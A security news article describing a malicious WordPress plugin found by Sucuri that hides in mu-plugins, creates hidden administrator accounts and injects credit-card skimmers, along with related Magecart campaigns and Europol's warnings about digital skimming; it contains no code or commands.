Cybersecurity researchers have uncovered a malicious WordPress plugin capable of creating unauthorized administrator accounts and injecting harmful JavaScript code designed to siphon credit card information. This activity is linked to a broader Magecart campaign specifically targeting e-commerce platforms, as reported by Sucuri.
According to security analyst Ben Martin, the rogue plugin employs deceptive tactics to disguise its true intent. “It contains misleading comments at the top of the code, falsely claiming to be ‘WordPress Cache Addons,'” he stated, underlining the lengths to which attackers will go for legitimacy.
Malicious plugins often infiltrate WordPress sites either through a compromised admin account or by exploiting flaws in existing plugins. Once installed, this malware embeds itself within the mu-plugins directory, effectively concealing its presence from site administrators.
Martin elaborated on the plugin’s persistent nature, explaining that removing it is especially challenging as it unregisters common callback functions used by legitimate plugins. Furthermore, the fraudulent plugin can establish hidden administrator accounts, allowing attackers sustained access without drawing attention.
The ultimate goal of this campaign is to introduce credit card skimming malware on checkout pages, exfiltrating sensitive data to a domain controlled by the attackers. This is particularly alarming given that a significant number of WordPress infections arise from compromised administrator users, emphasizing the importance of maintaining strict access controls.
This revelation comes shortly after warnings surfaced regarding a phishing campaign misleading users about unrelated security vulnerabilities, pushing them to install a harmful plugin presented as a security patch. Sucuri highlighted that attackers often exploit reserved status related to a CVE identifier, indicating the evolving tactics used in these campaigns.
The security firm also noted another Magecart operation that employs a different methodology, utilizing the WebSocket protocol to inject skimmer code into online stores. This malware activates when users unwittingly click on fake “Complete Order” buttons deceptively overlaid on legitimate ones.
In a recent report, Europol characterized digital skimming as an enduring threat resulting in significant theft and misuse of credit card data. It detailed a shift in tactics from front-end malware to back-end solutions, complicating detection efforts for site administrators.
Efforts to counteract these threats resulted in Europol notifying 443 online merchants that their customers’ payment card data had been compromised. Group-IB, collaborating with Europol, documented 23 families of JavaScript-based sniffers, utilized across various sectors and countries, signifying the widespread nature of this cybercrime.
In summary, the detection and reporting of this rogue WordPress plugin underline critical vulnerabilities within e-commerce sites. The tactics employed by the attackers reflect various techniques categorized in the MITRE ATT&CK framework, including initial access through compromised credentials, persistence via mu-plugins, and privilege escalation through hidden administrator accounts. As the cybersecurity landscape evolves, business owners must remain vigilant and proactive in securing their platforms against such sophisticated attacks.
